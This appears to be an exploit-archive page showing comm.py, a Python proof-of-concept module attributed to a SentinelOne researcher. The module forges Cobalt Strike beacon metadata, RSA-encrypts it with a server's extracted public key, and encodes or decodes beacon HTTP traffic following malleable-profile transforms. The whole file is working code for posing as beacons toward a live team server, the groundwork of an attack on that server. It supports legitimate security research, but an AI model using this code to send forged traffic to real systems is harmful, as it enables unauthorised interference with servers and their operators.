4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / comm.py PY
#!/usr/bin/python3
'''
By Gal Kristal from SentinelOne ([email protected]) @gal_kristal
These were awesome reference material:
    https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/
    https://github.com/nccgroup/pybeacon
'''

import struct
import base64
import hashlib
import random
import os
import string
import M2Crypto
import requests

PUBLIC_KEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----"

class Metadata(object):
    """
    Class to represent a beacon's metadata.
    This is specific to Cobalt 4 and up
    """
    def __init__(self, public_key, aes_source_bytes):
        """
        Generates a random beacon entry
        Args:
            public_key (bytes): The extracted public key from beacon configuration
            aes_source_bytes (bytes): 16 bytes used to generate AES keys from
        """
        self.public_key = public_key
        self.port = random.randint(40000,50000)
        self.ciphertext = ""
        self.charset = 20273
        self.ver = random.randint(1,10)
        self.ip = os.urandom(4)
        self.comp = ''.join(random.choices(string.ascii_uppercase + string.digits, k=7))
        self.user = ''.join(random.choices(string.ascii_uppercase + string.digits, k=7))
        self.pid = random.randint(1,50000) * 4 - 2  # ;)
        self.bid = random.randint(1,1000000) * 2
        self.barch = 1
        self.is64 = False
        self.high_integrity = False
        self.aes_source_bytes = aes_source_bytes
        self.junk = os.urandom(14)
        d = hashlib.sha256(aes_source_bytes).digest()        
        self.aes_key = d[0:16]
        self.hmac_key = d[16:]


    def rsa_encrypt(self, data):
        """Encrypt given data the way Cobalt's server likes
        
        Args:
            data (bytes): Data to encrypt
        
        Returns:
            bytes: 
        """
        bio = M2Crypto.BIO.MemoryBuffer(PUBLIC_KEY_TEMPLATE.format(base64.b64encode(self.public_key).decode()).encode())
        pubkey = M2Crypto.RSA.load_pub_key_bio(bio)
        # Format is: magic + dataLength + data
        # beef is the magic used by the server
        packed_data = b'\x00\x00\xBE\xEF' + struct.pack('>I', len(data)) + data
        return pubkey.public_encrypt(packed_data, M2Crypto.RSA.pkcs1_padding)


    def pack(self):
        data = self.aes_source_bytes + struct.pack('>hhIIHBH', self.charset, self.charset, self.bid, self.pid, self.port, self.is64, self.ver) + self.junk
        data += struct.pack('4s', self.ip)
        data += b'\x00' * (51 - len(data))
        data += '\t'.join([self.comp, self.user]).encode()
        return self.rsa_encrypt(data)


TERMINATION_STEPS = ['header', 'parameter', 'print']
TSTEPS = {1: "append", 2: "prepend", 3: "base64", 4: "print", 5: "parameter", 6: "header", 7: "build", 8: "netbios", 9: "const_parameter", 10: "const_header", 11: "netbiosu", 12: "uri_append", 13: "base64url", 14: "strrep", 15: "mask", 16: "const_host_header"}

# Could probably just be b'\x00'*4 + data
def mask(arg, data):
    key = os.urandom(4)
    data = data.encode('latin-1')
    return key.decode('latin-1') + ''.join(chr(c ^ key[i%4]) for i, c in enumerate(data))
    
def demask(arg, data):
    key = data[:4].encode('latin-1')
    data = data.encode('latin-1')
    return ''.join(chr(c ^ key[i%4]) for i, c in enumerate(data[4:]))

def netbios_decode(name, case):
    i = iter(name.upper())
    try:
        return ''.join([chr(((ord(c)-ord(case))<<4)+((ord(next(i))-ord(case))&0xF)) for c in i])
    except:
        return ''

func_dict_encode = {"append": lambda arg, data: data + arg,
"prepend": lambda arg, data: arg + data,
"base64": lambda arg, data: base64.b64encode(data),
"netbios": lambda arg, data: ''.join([chr((ord(c)>>4) + ord('a')) + chr((ord(c)&0xF) + ord('a')) for c in data]),
"netbiosu": lambda arg, data: ''.join([chr((ord(c)>>4) + ord('A')) + chr((ord(c)&0xF) + ord('A')) for c in data]),
"base64": lambda arg, data: base64.b64encode(data.encode('latin-1')).decode('latin-1'),
"base64url": lambda arg, data: base64.urlsafe_b64encode(data.encode('latin-1')).decode('latin-1').strip('='),
"mask": mask,
}

func_dict_decode = {"append": lambda arg, data: data[:-len(arg)],
"prepend": lambda arg, data: data[len(arg):],
"base64": lambda arg, data: base64.b64decode(data),
"netbios": lambda arg, data: netbios_decode(data, 'a'),
"netbiosu": lambda arg, data: netbios_decode(data, 'A'),
"base64": lambda arg, data: base64.b64decode(data.encode('latin-1')).decode('latin-1'),
"base64url": lambda arg, data: base64.urlsafe_b64decode(data.encode('latin-1')).decode('latin-1').strip('='),
"mask": demask,
}


class Transform(object):
    def __init__(self, trans_dict):
        """An helper class to tranform data according to cobalt's malleable profile
        
        Args:
            trans_dict (dict): A dictionary that came from packedSetting data. It's in the form of:
                                {'ConstHeaders':[], 'ConstParams': [], 'Metadata': [], 'SessionId': [], 'Output': []}
        """
        self.trans_dict = trans_dict

    def encode(self, metadata, output, sessionId):
        """
        
        Args:
            metadata (str): The metadata of a Beacon, usually given from Metadata.pack()
            output (str): If this is for a Beacon's response, then this is the response's data
            sessionId (str): the Beacon's ID
        
        Returns:
            (str, dict, dict): This is to be used in an HTTP request. The tuple is (request_body, request_headers, request_params)
        """
        params = {}
        headers = {}
        body = ''
        for step in self.trans_dict['Metadata']:
            action = step.split(' ')[0].lower()
            arg = step.lstrip(action).strip().strip('"')
            if action in TERMINATION_STEPS:
                if action == "header":
                    headers[arg] = metadata
                elif action == "parameter":
                    params[arg] = metadata
                elif action == "print":
                    body = metadata
            else:
                metadata = func_dict_encode[action](arg, metadata)

        for step in self.trans_dict['Output']:
            action = step.split(' ')[0].lower()
            arg = step.lstrip(action).strip().strip('"')
            if action in TERMINATION_STEPS:
                if action == "header":
                    headers[arg] = output
                elif action == "parameter":
                    params[arg] = output
                elif action == "print":
                    body = output
            else:
                output = func_dict_encode[action](arg, output)

        for step in self.trans_dict['SessionId']:
            action = step.split(' ')[0].lower()
            arg = step.lstrip(action).strip().strip('"')
            if action in TERMINATION_STEPS:
                if action == "header":
                    headers[arg] = sessionId
                elif action == "parameter":
                    params[arg] = sessionId
                elif action == "print":
                    body = sessionId
            else:
                sessionId = func_dict_encode[action](arg, sessionId)

        for step in self.trans_dict['ConstHeaders']:
            offset = step.find(': ')
            header, value = step[:offset], step[offset+2:]
            headers[header] = value

        for step in self.trans_dict['ConstParams']:
            offset = step.find('=')
            param, value = step[:offset], step[offset+1:]
            params[param] = value

        return body, headers, params

    def decode(self, body, headers, params):
        """
        Parses beacon's communication data from an HTTP request
        Args:
            body (str): The body of an HTTP request
            headers (dict): Headers dict from the HTTP request
            params (dict): Params dict from the HTTP request
        
        Returns:
            (str, str, str): The tuple is (metadata, output, sessionId)
        """
        metadata = ''
        output = ''
        sessionId = ''
        for step in self.trans_dict['Metadata'][::-1]:
            action = step.split(' ')[0].lower()
            arg = step.lstrip(action).strip().strip('"')
            if action in TERMINATION_STEPS:
                if action == "header":
                    metadata = headers[arg]
                elif action == "parameter":
                    metadata = params[arg]
                elif action == "print":
                    metadata = body
            else:
                metadata = func_dict_decode[action](arg, metadata)

        for step in self.trans_dict['Output'][::-1]:
            action = step.split(' ')[0].lower()
            arg = step.lstrip(action).strip().strip('"')
            if action in TERMINATION_STEPS:
                if action == "header":
                    output = headers[arg]
                elif action == "parameter":
                    output = params[arg]
                elif action == "print":
                    output = body
            else:
                output = func_dict_decode[action](arg, output)

        for step in self.trans_dict['SessionId'][::-1]:
            action = step.split(' ')[0].lower()
            arg = step.lstrip(action).strip().strip('"')
            if action in TERMINATION_STEPS:
                if action == "header":
                    sessionId = headers[arg]
                elif action == "parameter":
                    sessionId = params[arg]
                elif action == "print":
                    sessionId = body
            else:
                sessionId = func_dict_decode[action](arg, sessionId)

        return metadata, output, sessionId